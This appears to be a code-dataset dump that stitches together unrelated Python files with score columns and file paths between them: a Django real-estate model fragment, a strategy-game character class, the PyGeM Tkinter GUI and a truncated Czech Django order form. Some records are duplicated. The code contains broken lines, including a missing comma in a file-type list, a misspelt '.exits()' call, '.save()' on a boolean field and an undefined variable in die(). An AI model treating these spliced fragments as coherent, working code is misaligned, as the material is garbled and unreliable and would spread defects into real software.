property_area_number = IntegerField(_("How many sq/ft do you have of the above property per sq/ft? i.e (5 Per Sq/Ft x 10 = 50 Total Square Feet) leave it empty for rented properties"), default=1, null=True, blank=True, help_text="From 1-1000. to calculate to total price for square feets")
property_bathrooms = IntegerField(_("Bath Rooms"), choices=ROOMS, default=ONE, null=True, blank=False)
property_bedrooms = IntegerField(_("Bed Rooms"), choices=ROOMS, default=ONE, null=True, blank=False)
property_parlors = IntegerField(_("Parlors"), choices=ROOMS, default=ONE, null=True, blank=False)
property_latitude = FloatField(_("Map Latitude"), null=True, default=0.000000000, validators=[MinValueValidator(-90.000000000), MaxValueValidator(90.000000000)], help_text="You can find this on google maps by inputing the actual property address and right clicking on the location pointer to reveal the latitude")
property_longitude = FloatField(_("Map Longitude"), null=True, default=0.000000000, validators=[MinValueValidator(-180.000000000), MaxValueValidator(180.000000000)], help_text="You can find this on google maps by inputing the actual property address and right clicking on the location pointer to reveal the longitude")
property_location = CharField(_("Property Street Address"), max_length=500, null=True, blank=False, help_text="eg. 123 Close, Street !!! PS: Do not attach a state or country when listing this property !!!")
property_near_location = CharField(_("Property Closest building street address"), max_length=500, null=True, blank=False, help_text="eg. 123 Close, Street !!! PS: Do not attach a state or country when listing this property !!!")
property_city = ForeignKey("City", on_delete=SET_NULL, null=True, related_name="propertycity")
property_state = ForeignKey("State", on_delete=SET_NULL, null=True, related_name="propertystate")
property_detail = HTMLField()
property_age = CharField(_("Building Age (Optional)"), max_length=50, null=True, choices=PROPERTY_AGE, default=ZEROFIVE, blank=True)
property_features = ManyToManyField("PropertyFeature", help_text="Select all features that apply for the house")
property_expire = IntegerField(_("How long is the renting or buying supposed to last, 1 year or more?"), default=0*455, null=True, blank=True, help_text="use 100 if it a land that is being purchased. and any figure when it is a rentage. NOTE: An additional 2 months is given to a property before it is reactivated as availble for purchase after its last purchased date")
property_sold = BooleanField(default=False)
approved = BooleanField(default=False)
featured = BooleanField(default=False)
def total_area(self):
if self.property_area and self.property_area_number:
return self.property_area * Decimal(self.property_area_number)
def sqft_total(self):
if self.property_price and self.property_area_number:
return self.property_price * Decimal(self.property_area_number)
def last_purchased_date(self):
if self.property_sold:
return datetime.date.today()
def next_expiry_date(self):
if self.last_purchased_date and self.property_expire > 0 and self.property_expire < 100:
return self.last_purchased_date + timedelta(days=self.property_expire)
def now_availble(self):
today = datetime.date.today()
if today > self.next_expiry_date and self.property_sold:
self.property_sold = False
self.property_sold.save()
return True
return False
def formated_address(self):
return self.property_location.replace(" ", "+")
def formated_state(self):
return self.property_state.title.replace(" ", "+")
def formated_closest_address(self):
return self.property_near_location.replace(" ", "+")
def __str__(self):
return str(self.property_title)
def title(self):
return self.property_title
def get_related_property(self):
return Property.objects.filter(property_agent=self.property_agent, property_type=self.property_type, property_state=self.property_state, approved=True).exclude(property_title=self.property_title)[:4]
def get_featured_property(self):
return Property.objects.filter(property_agent=self.property_agent, property_type=self.property_type, property_state=self.property_state, approved=True, featured=True).exclude(property_title=self.property_title)[:4]
def get_related_property_by_agent(self):
return Property.objects.filter(property_agent=self.property_agent)[:10]
def get_related_property_by_state(self):
return Property.objects.filter(property_state=self.property_state)[:10]
@property
def get_image_url(self):
img = self.propertyimage.first()
if img:
return img.image.url
return None
def get_all_images(self):
return self.propertyimage.all()
def get_all_floors(self):
return self.propertyplan.all()
def get_video_url(self):
img = self.propertyvideo.first()
if img:
return img.video.url
return None
class Meta:
managed = True
verbose_name = "Property"
verbose_name_plural = "Properties"
ordering = ["-created", "property_title"]
def get_absolute_url(self):
"""Get url for blog's detail view.
Returns:
str: URL for blog detail.
"""
return reverse("property:detail", kwargs={"slug": self.slug})
def get_update_url(self):
return f"{self.get_absolute_url}/update"
def get_delete_url(self):
return f"{self.get_absolute_url}/delete"
class PropertyImage(TimeStampedModel):
property = ForeignKey("Property", on_delete=CASCADE, related_name="propertyimage")
image = ResizedImageField(size=[520, 397], quality=80, crop=['middle', 'center'], upload_to=property_images, force_format='JPEG', null=True, blank=True, help_text="image size: 520x397.")
def __str__(self):
return f"{self.property.property_title} Image"
class PropertyBlueprint(TimeStampedModel):
GROUND = "Ground Floor"
FIRST = "First Floor"
SECOND = "Second Floor"
THIRD = "Third Floor"
FOURTH = "Fourth Floor"
ALL = "All Floor Type"
PENTHOUSE = "Penthouse"
GARAGE = "Garage"
POOL_HOUSE = "Pool House"
BLUEPRINT = (
(GROUND, "Ground Floor"),
(FIRST, "First Floor"),
(SECOND, "Second Floor"),
(THIRD, "Third Floor"),
(FOURTH, "Fourth Floor"),
(ALL, "All Floor Type"),
(PENTHOUSE, "Penthouse"),
(GARAGE, "Garage"),
(POOL_HOUSE, "Pool House"),
)
property = ForeignKey("Property", on_delete=CASCADE, related_name="propertyplan")
type = CharField(_("Blueprint"), null=True, blank=False, max_length=50, choices=BLUEPRINT, default=FIRST)
image = ResizedImageField(size=[1000, 576], quality=70, crop=['middle', 'center'], upload_to=blueprint_image, force_format='JPEG', null=True, blank=True, help_text="image size: 1000x576.")
floor_area = DecimalField(_("Area Sq/Ft"), max_digits=20, decimal_places=2, default=0.00, blank=False)
floor_detail = HTMLField()
def __str__(self):
return f"{self.property.property_title} {self.type} Blueprint"
class PropertyVideo(TimeStampedModel):
property = ForeignKey("Property", on_delete=CASCADE, related_name="propertyvideo")
video = FileField(upload_to=property_video, null=True, blank=True, help_text="Your video should be 40Seconds Long, 20MB in size max")
def __str__(self):
return f"{self.property.property_title} New Video"
class PropertyCompare(TimeStampedModel):
property = ForeignKey(Property, on_delete=SET_NULL, null=True, default=1, related_name="compareproperty")
class Meta:
managed = True
verbose_name = "Property Compare"
verbose_name_plural = "Properties Compared"
ordering = ["-created"]
class PropertyBookmark(TimeStampedModel):
user = ForeignKey(User, on_delete=CASCADE, related_name="bookmarkuser")
property = ForeignKey(Property, on_delete=SET_NULL, null=True, related_name="bookmarkproperty")
active = BooleanField(default=False)
def __str__(self):
return f"{self.user.fullname} Bookmarked {self.property.property_title}"
def deleted_property(self):
obj = Property.objects.filter(approved=True, property_sold=False, property_title=self.property.property_title).exits()
if not obj:
PropertyBookmark.objects.filter(property=self.property, user=self.user).delete()
return True
return False
def sold_property(self):
obj = Property.objects.filter(approved=True, property_sold=True, property_title=self.property.property_title).exits()
if obj:
PropertyBookmark.objects.filter(property=self.property, user=self.user, active=True).update(active=False)
return True
return False
class Meta:
managed = True
verbose_name = "Property Bookmark"
verbose_name_plural = "Properties Bookmarked"
ordering = ["-created"]
class PropertySearchSaved(TimeStampedModel):
user = ForeignKey(User, on_delete=CASCADE, related_name="searchuser")
search_link = URLField(blank=True, null=True)
saved = BooleanField(default=False)
def __str__(self):
return f"{self.user.fullname} saved {self.search_link}"
class Meta:
managed = True
verbose_name = "Property Search Query"
verbose_name_plural = "Properties Search Query"
ordering = ["-created"] | 0.499512 | 0.101545 |
from culture import Culture
import random
class Character():
def __init__(self, models, culture, residence, age):
self.culture = culture
self.models = models
self.place = residence
# Fullname will later always be set to highest title
self.age = age
self.state = "alive" # alive or dead
self.titles = []
g = random.randint(0,1)
if g == 0:
self.gender = "m"
self.firstname = culture.generate_name(models, "m")
else:
self.gender = "f"
self.firstname = culture.generate_name(models, "f")
self.fullname = ""
self.refresh_fullname()
self.skills = {
"Diplomacy":0,
"Military":0,
"Commerce":0,
"Intrigue":0,
"Scholarship":0
}
self.competence = 0
self.assign_skillpoints()
self.focus = []
self.setfocus()
def refresh_fullname(self):
highest_title = self.get_highest_title()
self.fullname = "{} {}".format(highest_title, self.firstname)
def assign_skillpoints(self):
free_points = 0
for i in range(4):
free_points += random.randint(1,6)
self.competence = free_points
for i in range(free_points):
while True:
r = random.randint(1,5)
if r == 1 and self.skills["Diplomacy"] < 5:
self.skills["Diplomacy"] += 1
break
elif r == 2 and self.skills["Military"] < 5:
self.skills["Military"] += 1
break
elif r == 3 and self.skills["Commerce"] < 5:
self.skills["Commerce"] += 1
break
elif r == 4 and self.skills["Intrigue"] < 5:
self.skills["Intrigue"] += 1
break
elif r == 5 and self.skills["Scholarship"] < 5:
self.skills["Scholarship"] += 1
break
def setfocus(self):
""" Returns a list of the highest skills."""
highest = [k for k,v in self.skills.items() if v == max(self.skills.values())]
self.focus = highest
def get_highest_title(self):
if len(self.titles) > 0:
titles_levels = []
for t in self.titles:
titles_levels.append((t, t.level))
h_title = sorted(titles_levels, key=lambda x: x[1], reverse=True)[0][0]
if self.gender == "m":
return h_title.getMTitle()
else:
return h_title.getFTitle()
else:
if self.gender == "m":
return "Sir"
else:
return "Lady"
def _age(self):
self.age += 1
if self.age > 50: # Age 100 100% dead, 50 0.1 % dead chance
chance_to_die = (self.age - 50)*0.2
m = random.randint(1,100)
if m <= chance_to_die:
self.die()
def die(self):
# Lose title if has any and distribute them to successors
# Standard succession type is Gavelkind => depending on Culture
# Next line is only a placeholder until a proper system is implemented
successor = Character(models, self.culture, self.place, random.randint(30,60))
self.state = "dead" | characters.py |
from culture import Culture
import random
class Character():
def __init__(self, models, culture, residence, age):
self.culture = culture
self.models = models
self.place = residence
# Fullname will later always be set to highest title
self.age = age
self.state = "alive" # alive or dead
self.titles = []
g = random.randint(0,1)
if g == 0:
self.gender = "m"
self.firstname = culture.generate_name(models, "m")
else:
self.gender = "f"
self.firstname = culture.generate_name(models, "f")
self.fullname = ""
self.refresh_fullname()
self.skills = {
"Diplomacy":0,
"Military":0,
"Commerce":0,
"Intrigue":0,
"Scholarship":0
}
self.competence = 0
self.assign_skillpoints()
self.focus = []
self.setfocus()
def refresh_fullname(self):
highest_title = self.get_highest_title()
self.fullname = "{} {}".format(highest_title, self.firstname)
def assign_skillpoints(self):
free_points = 0
for i in range(4):
free_points += random.randint(1,6)
self.competence = free_points
for i in range(free_points):
while True:
r = random.randint(1,5)
if r == 1 and self.skills["Diplomacy"] < 5:
self.skills["Diplomacy"] += 1
break
elif r == 2 and self.skills["Military"] < 5:
self.skills["Military"] += 1
break
elif r == 3 and self.skills["Commerce"] < 5:
self.skills["Commerce"] += 1
break
elif r == 4 and self.skills["Intrigue"] < 5:
self.skills["Intrigue"] += 1
break
elif r == 5 and self.skills["Scholarship"] < 5:
self.skills["Scholarship"] += 1
break
def setfocus(self):
""" Returns a list of the highest skills."""
highest = [k for k,v in self.skills.items() if v == max(self.skills.values())]
self.focus = highest
def get_highest_title(self):
if len(self.titles) > 0:
titles_levels = []
for t in self.titles:
titles_levels.append((t, t.level))
h_title = sorted(titles_levels, key=lambda x: x[1], reverse=True)[0][0]
if self.gender == "m":
return h_title.getMTitle()
else:
return h_title.getFTitle()
else:
if self.gender == "m":
return "Sir"
else:
return "Lady"
def _age(self):
self.age += 1
if self.age > 50: # Age 100 100% dead, 50 0.1 % dead chance
chance_to_die = (self.age - 50)*0.2
m = random.randint(1,100)
if m <= chance_to_die:
self.die()
def die(self):
# Lose title if has any and distribute them to successors
# Standard succession type is Gavelkind => depending on Culture
# Next line is only a placeholder until a proper system is implemented
successor = Character(models, self.culture, self.place, random.randint(30,60))
self.state = "dead" | 0.35869 | 0.168207 |
try:
import tkinter
from tkinter.filedialog import askopenfilename
except ImportError:
import Tkinter as tkinter
from tkFileDialog import askopenfilename
import os
import webbrowser
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
class Gui(object):
"""
The class for the Graphic Unit Interface.
:cvar string filename_geometry: input geometry to be morphed.
:cvar string filename_parameters: input parameters file for FFD.
:cvar int check_var_dump_orig: dump or not the original FFD lattice.
:cvar int check_var_dump_morphed: dump or not the morphed FFD lattice.
:cvar string outfilename: name of the output file geometry.
The extension of the file is set automatically equal to the on
of input file 'filename_geometry'.
:cvar string outfilename_lattice_orig: name of the dumped file
for the original lattice.
The extension of the file is set automatically equal to '.vtk'.
:cvar string outfilename_lattice_mod: name of the dumped file
for the morphed lattice.
The extension of the file is set automatically equal to '.vtk'.
:cvar tkinter.Tk root: main window object of the GUI.
:cvar string print_geometry_path: geometry path to be printed close to the
'pick geometry' button.
:cvar string print_parameter_path: parameters file path to be printed
close to the 'pick parameters' button.
:cvar tkinter.Label label_geo: label related to 'print_geometry_path'.
:cvar tkinter.Label label_params: label related to 'print_parameters_path'.
:cvar string url: url of the github page of PyGeM.
:cvar tkinter.Canvas logo_panel: canvas for PyGeM logo.
:cvar tkinter.PhotoImage img: PyGeM logo.
:cvar tkinter.Frame orig_geo_frame: frame for plotting of the
original geometry.
:cvar tkinter.Frame mod_geo_frame: frame for plotting of the final geometry.
"""
def __init__(self):
self.root = tkinter.Tk()
self.root.resizable(width=False, height=False)
self.root.minsize(width=1400, height=400)
self.root.maxsize(width=1400, height=400)
self.root.title('PyGeM')
self.filename_geometry = tkinter.StringVar()
self.filename_parameters = tkinter.StringVar()
self.check_var_dump_orig = tkinter.IntVar()
self.check_var_dump_morphed = tkinter.IntVar()
self.outfilename = tkinter.StringVar()
self.outfilename_lattice_orig = tkinter.StringVar()
self.outfilename_lattice_mod = tkinter.StringVar()
self.print_geometry_path = tkinter.StringVar()
self.print_parameter_path = tkinter.StringVar()
self.label_geo = None
self.label_params = None
self.url = 'https://github.com/mathLab/PyGeM'
self.logo_panel = None
self.img = None
self.orig_geo_frame = None
self.mod_geo_frame = None
def _chose_geometry(self):
"""
The private method explores the file system and allows to select the
wanted geometry.
Up to now, you can select only IGES, OpenFOAM, STL, UNV or VTK
geometry file.
"""
self.filename_geometry =\
askopenfilename(filetypes=[("IGES File", ('*.iges', '*.igs')),
("OpenFOAM File", '*'),
('STL File', '*.stl'),
('UNV File', '*.unv'),
('VTK File', '*.vtk'),
('STEP File', ('*.step, *.stp')) ('All', '*')])
self.print_geometry_path.set(self.filename_geometry)
self.label_geo.configure(fg='green')
def _chose_parameters(self):
"""
The private method explores the file system and allows to select the
wanted parameters file.
It visualizes only .prm files.
"""
self.filename_parameters = askopenfilename(
filetypes=[("Params File", "*.prm")])
self.print_parameter_path.set(self.filename_parameters)
self.label_params.configure(fg='green')
def _run_simulation(self):
"""
The private method runs the geometrical morphing.
"""
import pygem as pg
params = pg.params.FFDParameters()
params.read_parameters(filename=self.filename_parameters)
file_extension_in = os.path.splitext(self.filename_geometry)[-1]
ext_handlers = {'.stl': pg.stlhandler.StlHandler(),
'.iges': pg.igeshandler.IgesHandler(),
'.igs': pg.igeshandler.IgesHandler(),
'.unv': pg.unvhandler.UnvHandler(),
'': pg.openfhandler.OpenFoamHandler(),
'.vtk': pg.vtkhandler.VtkHandler(),
'.stp': pg.stephandler.StepHandler(),
'.step': pg.stephandler.StepHandler()}
if file_extension_in in ext_handlers:
geo_handler = ext_handlers[file_extension_in]
else:
raise NotImplementedError("Format not implemented yet.")
mesh_points = geo_handler.parse(self.filename_geometry)
free_form = pg.freeform.FFD(params, mesh_points)
free_form.perform()
new_mesh_points = free_form.modified_mesh_points
geo_handler.write(new_mesh_points,
self.outfilename.get() + file_extension_in)
if self.check_var_dump_orig.get() == 1:
pg.utils.write_bounding_box(
params, self.outfilename_lattice_orig.get() + '.vtk', False)
if self.check_var_dump_morphed.get() == 1:
pg.utils.write_bounding_box(
params, self.outfilename_lattice_mod.get() + '.vtk', True)
if file_extension_in in ['.vtk', '.stl', '.iges', '.igs']:
figure_in = geo_handler.plot()
figure_in.set_size_inches(4, 3)
FigureCanvasTkAgg(figure_in, master=self.orig_geo_frame).\
get_tk_widget().grid(row=1, column=0, padx=5, pady=5)
figure_out = geo_handler.plot(
self.outfilename.get() + file_extension_in)
figure_out.set_size_inches(4, 3)
FigureCanvasTkAgg(figure_out, master=self.mod_geo_frame).\
get_tk_widget().grid(row=1, column=0, padx=5, pady=5)
def _goto_website(self):
"""
The private method opens the PyGeM main page on github.
It is used for info about PyGeM in the menu.
"""
webbrowser.open(self.url)
def _main(self):
"""
The private method inizializes and visualizes the window.
"""
self.logo_panel = tkinter.Canvas(self.root, height=60, width=60)
self.logo_panel.pack(side="bottom", padx=5, pady=5, anchor=tkinter.SE)
try:
self.img = tkinter.PhotoImage(master=self.logo_panel,
file='readme/logo_PyGeM_gui.gif')
except: # TODO : which exception?
self.img = tkinter.PhotoImage(master=self.logo_panel,
file='../readme/logo_PyGeM_gui.gif')
self.logo_panel.create_image(35, 35, image=self.img)
self.orig_geo_frame = tkinter.Frame(self.root,
height=450,
width=360,
bg='#c1d0f0')
self.orig_geo_frame.pack(side="left", padx=5, pady=5)
self.orig_geo_frame.pack_propagate(0)
tkinter.Label(self.orig_geo_frame,
text="INPUT GEOMETRY",
bg='#c1d0f0',
font=("Arial", 20)).grid(row=0, column=0, padx=3, pady=3)
self.mod_geo_frame = tkinter.Frame(self.root,
height=450,
width=360,
bg='#80ff80',
padx=5,
pady=5)
self.mod_geo_frame.pack(side="right", padx=5, pady=5)
self.mod_geo_frame.pack_propagate(0)
tkinter.Label(self.mod_geo_frame,
text="OUTPUT GEOMETRY",
bg='#80ff80',
font=("Arial", 20)).grid(row=0, column=0, padx=3, pady=3)
code_frame = tkinter.Frame(self.root,
height=490,
width=360,
relief=tkinter.GROOVE,
borderwidth=1)
code_frame.pack(padx=5, pady=5)
code_frame.pack_propagate(0)
# Buttons 1
tkinter.Button(code_frame,
text="Pick the geometry",
command=self._chose_geometry).grid(row=0,
column=0,
padx=3,
pady=3)
self.label_geo = tkinter.Label(code_frame,
textvariable=self.print_geometry_path,
fg='red')
self.print_geometry_path.set("No geometry chosen!")
self.label_geo.grid(row=0, column=1, padx=3, pady=3)
# Button 2
tkinter.Button(code_frame,
text="Pick the parameters",
command=self._chose_parameters).grid(row=1,
column=0,
padx=3,
pady=3)
self.label_params = tkinter.Label(code_frame,
textvariable=self.print_parameter_path,
fg='red')
self.print_parameter_path.set("No parameters file chosen!")
self.label_params.grid(row=1, column=1, padx=3, pady=3)
# Entry
tkinter.Label(code_frame,
text="Output geometry file").grid(row=2,
column=0,
padx=3,
pady=3)
tkinter.Entry(code_frame,
bd=5,
textvariable=self.outfilename).grid(row=2,
column=1,
padx=3,
pady=3)
# Checkboxes
tkinter.Checkbutton(code_frame,
text="Dump Original FFD lattice",
variable=self.check_var_dump_orig,
onvalue=1,
offvalue=0,
height=3,
width=20).grid(row=3, column=0)
tkinter.Entry(code_frame,
bd=5,
textvariable=self.outfilename_lattice_orig).grid(row=3,
column=1)
tkinter.Checkbutton(code_frame,
text="Dump Morphed FFD lattice",
variable=self.check_var_dump_morphed,
onvalue=1,
offvalue=0,
height=3,
width=20).grid(row=4, column=0)
tkinter.Entry(code_frame,
bd=5,
textvariable=self.outfilename_lattice_mod).grid(row=4,
column=1)
# Run button
tkinter.Button(code_frame,
text="Run PyGeM",
command=self._run_simulation,
bg='#065893',
fg='#f19625',
font='bold').grid(row=5,
column=0,
columnspan=2,
padx=3,
pady=3)
# Menu
menubar = tkinter.Menu(self.root)
helpmenu = tkinter.Menu(menubar, tearoff=0)
helpmenu.add_command(label="About...", command=self._goto_website)
menubar.add_cascade(label="Help", menu=helpmenu)
self.root.config(menu=menubar)
def start(self):
"""
This method initializes and starts the GUI.
"""
self._main()
self.root.mainloop()
if __name__ == "__main__":
app = Gui()
app.start() | pygem/gui.py | try:
import tkinter
from tkinter.filedialog import askopenfilename
except ImportError:
import Tkinter as tkinter
from tkFileDialog import askopenfilename
import os
import webbrowser
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
class Gui(object):
"""
The class for the Graphic Unit Interface.
:cvar string filename_geometry: input geometry to be morphed.
:cvar string filename_parameters: input parameters file for FFD.
:cvar int check_var_dump_orig: dump or not the original FFD lattice.
:cvar int check_var_dump_morphed: dump or not the morphed FFD lattice.
:cvar string outfilename: name of the output file geometry.
The extension of the file is set automatically equal to the on
of input file 'filename_geometry'.
:cvar string outfilename_lattice_orig: name of the dumped file
for the original lattice.
The extension of the file is set automatically equal to '.vtk'.
:cvar string outfilename_lattice_mod: name of the dumped file
for the morphed lattice.
The extension of the file is set automatically equal to '.vtk'.
:cvar tkinter.Tk root: main window object of the GUI.
:cvar string print_geometry_path: geometry path to be printed close to the
'pick geometry' button.
:cvar string print_parameter_path: parameters file path to be printed
close to the 'pick parameters' button.
:cvar tkinter.Label label_geo: label related to 'print_geometry_path'.
:cvar tkinter.Label label_params: label related to 'print_parameters_path'.
:cvar string url: url of the github page of PyGeM.
:cvar tkinter.Canvas logo_panel: canvas for PyGeM logo.
:cvar tkinter.PhotoImage img: PyGeM logo.
:cvar tkinter.Frame orig_geo_frame: frame for plotting of the
original geometry.
:cvar tkinter.Frame mod_geo_frame: frame for plotting of the final geometry.
"""
def __init__(self):
self.root = tkinter.Tk()
self.root.resizable(width=False, height=False)
self.root.minsize(width=1400, height=400)
self.root.maxsize(width=1400, height=400)
self.root.title('PyGeM')
self.filename_geometry = tkinter.StringVar()
self.filename_parameters = tkinter.StringVar()
self.check_var_dump_orig = tkinter.IntVar()
self.check_var_dump_morphed = tkinter.IntVar()
self.outfilename = tkinter.StringVar()
self.outfilename_lattice_orig = tkinter.StringVar()
self.outfilename_lattice_mod = tkinter.StringVar()
self.print_geometry_path = tkinter.StringVar()
self.print_parameter_path = tkinter.StringVar()
self.label_geo = None
self.label_params = None
self.url = 'https://github.com/mathLab/PyGeM'
self.logo_panel = None
self.img = None
self.orig_geo_frame = None
self.mod_geo_frame = None
def _chose_geometry(self):
"""
The private method explores the file system and allows to select the
wanted geometry.
Up to now, you can select only IGES, OpenFOAM, STL, UNV or VTK
geometry file.
"""
self.filename_geometry =\
askopenfilename(filetypes=[("IGES File", ('*.iges', '*.igs')),
("OpenFOAM File", '*'),
('STL File', '*.stl'),
('UNV File', '*.unv'),
('VTK File', '*.vtk'),
('STEP File', ('*.step, *.stp')) ('All', '*')])
self.print_geometry_path.set(self.filename_geometry)
self.label_geo.configure(fg='green')
def _chose_parameters(self):
"""
The private method explores the file system and allows to select the
wanted parameters file.
It visualizes only .prm files.
"""
self.filename_parameters = askopenfilename(
filetypes=[("Params File", "*.prm")])
self.print_parameter_path.set(self.filename_parameters)
self.label_params.configure(fg='green')
def _run_simulation(self):
"""
The private method runs the geometrical morphing.
"""
import pygem as pg
params = pg.params.FFDParameters()
params.read_parameters(filename=self.filename_parameters)
file_extension_in = os.path.splitext(self.filename_geometry)[-1]
ext_handlers = {'.stl': pg.stlhandler.StlHandler(),
'.iges': pg.igeshandler.IgesHandler(),
'.igs': pg.igeshandler.IgesHandler(),
'.unv': pg.unvhandler.UnvHandler(),
'': pg.openfhandler.OpenFoamHandler(),
'.vtk': pg.vtkhandler.VtkHandler(),
'.stp': pg.stephandler.StepHandler(),
'.step': pg.stephandler.StepHandler()}
if file_extension_in in ext_handlers:
geo_handler = ext_handlers[file_extension_in]
else:
raise NotImplementedError("Format not implemented yet.")
mesh_points = geo_handler.parse(self.filename_geometry)
free_form = pg.freeform.FFD(params, mesh_points)
free_form.perform()
new_mesh_points = free_form.modified_mesh_points
geo_handler.write(new_mesh_points,
self.outfilename.get() + file_extension_in)
if self.check_var_dump_orig.get() == 1:
pg.utils.write_bounding_box(
params, self.outfilename_lattice_orig.get() + '.vtk', False)
if self.check_var_dump_morphed.get() == 1:
pg.utils.write_bounding_box(
params, self.outfilename_lattice_mod.get() + '.vtk', True)
if file_extension_in in ['.vtk', '.stl', '.iges', '.igs']:
figure_in = geo_handler.plot()
figure_in.set_size_inches(4, 3)
FigureCanvasTkAgg(figure_in, master=self.orig_geo_frame).\
get_tk_widget().grid(row=1, column=0, padx=5, pady=5)
figure_out = geo_handler.plot(
self.outfilename.get() + file_extension_in)
figure_out.set_size_inches(4, 3)
FigureCanvasTkAgg(figure_out, master=self.mod_geo_frame).\
get_tk_widget().grid(row=1, column=0, padx=5, pady=5)
def _goto_website(self):
"""
The private method opens the PyGeM main page on github.
It is used for info about PyGeM in the menu.
"""
webbrowser.open(self.url)
def _main(self):
"""
The private method inizializes and visualizes the window.
"""
self.logo_panel = tkinter.Canvas(self.root, height=60, width=60)
self.logo_panel.pack(side="bottom", padx=5, pady=5, anchor=tkinter.SE)
try:
self.img = tkinter.PhotoImage(master=self.logo_panel,
file='readme/logo_PyGeM_gui.gif')
except: # TODO : which exception?
self.img = tkinter.PhotoImage(master=self.logo_panel,
file='../readme/logo_PyGeM_gui.gif')
self.logo_panel.create_image(35, 35, image=self.img)
self.orig_geo_frame = tkinter.Frame(self.root,
height=450,
width=360,
bg='#c1d0f0')
self.orig_geo_frame.pack(side="left", padx=5, pady=5)
self.orig_geo_frame.pack_propagate(0)
tkinter.Label(self.orig_geo_frame,
text="INPUT GEOMETRY",
bg='#c1d0f0',
font=("Arial", 20)).grid(row=0, column=0, padx=3, pady=3)
self.mod_geo_frame = tkinter.Frame(self.root,
height=450,
width=360,
bg='#80ff80',
padx=5,
pady=5)
self.mod_geo_frame.pack(side="right", padx=5, pady=5)
self.mod_geo_frame.pack_propagate(0)
tkinter.Label(self.mod_geo_frame,
text="OUTPUT GEOMETRY",
bg='#80ff80',
font=("Arial", 20)).grid(row=0, column=0, padx=3, pady=3)
code_frame = tkinter.Frame(self.root,
height=490,
width=360,
relief=tkinter.GROOVE,
borderwidth=1)
code_frame.pack(padx=5, pady=5)
code_frame.pack_propagate(0)
# Buttons 1
tkinter.Button(code_frame,
text="Pick the geometry",
command=self._chose_geometry).grid(row=0,
column=0,
padx=3,
pady=3)
self.label_geo = tkinter.Label(code_frame,
textvariable=self.print_geometry_path,
fg='red')
self.print_geometry_path.set("No geometry chosen!")
self.label_geo.grid(row=0, column=1, padx=3, pady=3)
# Button 2
tkinter.Button(code_frame,
text="Pick the parameters",
command=self._chose_parameters).grid(row=1,
column=0,
padx=3,
pady=3)
self.label_params = tkinter.Label(code_frame,
textvariable=self.print_parameter_path,
fg='red')
self.print_parameter_path.set("No parameters file chosen!")
self.label_params.grid(row=1, column=1, padx=3, pady=3)
# Entry
tkinter.Label(code_frame,
text="Output geometry file").grid(row=2,
column=0,
padx=3,
pady=3)
tkinter.Entry(code_frame,
bd=5,
textvariable=self.outfilename).grid(row=2,
column=1,
padx=3,
pady=3)
# Checkboxes
tkinter.Checkbutton(code_frame,
text="Dump Original FFD lattice",
variable=self.check_var_dump_orig,
onvalue=1,
offvalue=0,
height=3,
width=20).grid(row=3, column=0)
tkinter.Entry(code_frame,
bd=5,
textvariable=self.outfilename_lattice_orig).grid(row=3,
column=1)
tkinter.Checkbutton(code_frame,
text="Dump Morphed FFD lattice",
variable=self.check_var_dump_morphed,
onvalue=1,
offvalue=0,
height=3,
width=20).grid(row=4, column=0)
tkinter.Entry(code_frame,
bd=5,
textvariable=self.outfilename_lattice_mod).grid(row=4,
column=1)
# Run button
tkinter.Button(code_frame,
text="Run PyGeM",
command=self._run_simulation,
bg='#065893',
fg='#f19625',
font='bold').grid(row=5,
column=0,
columnspan=2,
padx=3,
pady=3)
# Menu
menubar = tkinter.Menu(self.root)
helpmenu = tkinter.Menu(menubar, tearoff=0)
helpmenu.add_command(label="About...", command=self._goto_website)
menubar.add_cascade(label="Help", menu=helpmenu)
self.root.config(menu=menubar)
def start(self):
"""
This method initializes and starts the GUI.
"""
self._main()
self.root.mainloop()
if __name__ == "__main__":
app = Gui()
app.start() | 0.50293 | 0.220248 |
from __future__ import absolute_import
from django.utils import timezone
from crispy_forms.layout import \
HTML, Layout, Field, Fieldset, MultiField, Div
from crispy_forms.bootstrap import PrependedText
from django.contrib.auth import authenticate, get_user_model, login
from django.contrib.auth.models import User
from django.contrib.auth.tokens import \
default_token_generator as token_generator
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import forms, messages
from .models import Orders
from horizon.utils import validators
from horizon_contrib.forms import SelfHandlingForm
from leonardo.utils.emails import send_templated_email as send_mail
from django.conf import settings
class OrderForm(SelfHandlingForm):
import sys
reload(sys)
sys.setdefaultencoding('UTF8')
error_required = 'Toto pole je vyžadováno.'
invalid_email_message = 'Zadejte správný formát e-mailu.'
jmeno = forms.CharField(label="Jméno",
max_length=255,
widget=forms.TextInput(
attrs={'placeholder':
'Jméno',
'autofocus': 'autofocus'}),
error_messages={'required': error_required})
prijmeni = forms.CharField(label="Příjmení",
max_length=255,
widget=forms.TextInput(
attrs={'placeholder':
'Příjmení'}),
error_messages={'required': error_required})
email = forms.EmailField(label="E-mail",
widget=forms.EmailInput(
attrs={'placeholder': 'E-mail'}),
error_messages={'required': error_required,
'invalid': invalid_email_message})
telefon = forms.IntegerField(label="Telefon",
widget=forms.NumberInput(
attrs={'placeholder': 'Telefon'}),
error_messages={'required': error_required})
zprava = forms.CharField(label="Zpráva",
widget=forms.Textarea(
attrs={
'placeholder':
'Zašlete nám Vaši objednávku'}),
error_messages={
'required': error_required
})
def __init__(self, *args, **kwargs):
super(OrderForm, self).__init__(*args, **kwargs)
self.helper.layout = Layout(
Div('jmeno', style='padding:5px', css_class='col-md-6'),
Div('prijmeni', style='padding:5px', css_class='col-md-6'),
PrependedText('email', '@', placeholder="E-mail"),
Div('telefon', 'zprava', style='padding:5px',
css_class='col-md-12')
)
def handle(self, request, data):
Orders.objects.create(jmeno=data['jmeno'],
prijmeni=data['prijmeni'],
email=data['email'],
telefon=data['telefon'],
zprava=data['zprava'],
datum=timezone.now())
messages.success(request, "Objednávka úspěšně dokončena.")
return True
class VzkazVavraForm(SelfHandlingForm):
import sys
reload(sys)
sys.setdefaultencoding('UTF8')
error_required = 'Toto pole je vyžadováno.'
invalid_email_message = 'Zadejte správný formát e-mailu.'
jmeno = forms.CharField(label="Jméno",
max_length=255,
widget=forms.TextInput(
attrs={'placeholder':
'Jméno',
'autofocus': 'autofocus'}),
error_messages={'required': error_required})
prijmeni = forms.CharField(label="Příjmení",
max_length=255,
widget=forms.TextInput(
attrs={'placeholder':
'Příjmení'}),
error_messages={'required': error_required})
email = forms.EmailField(label="E-mail",
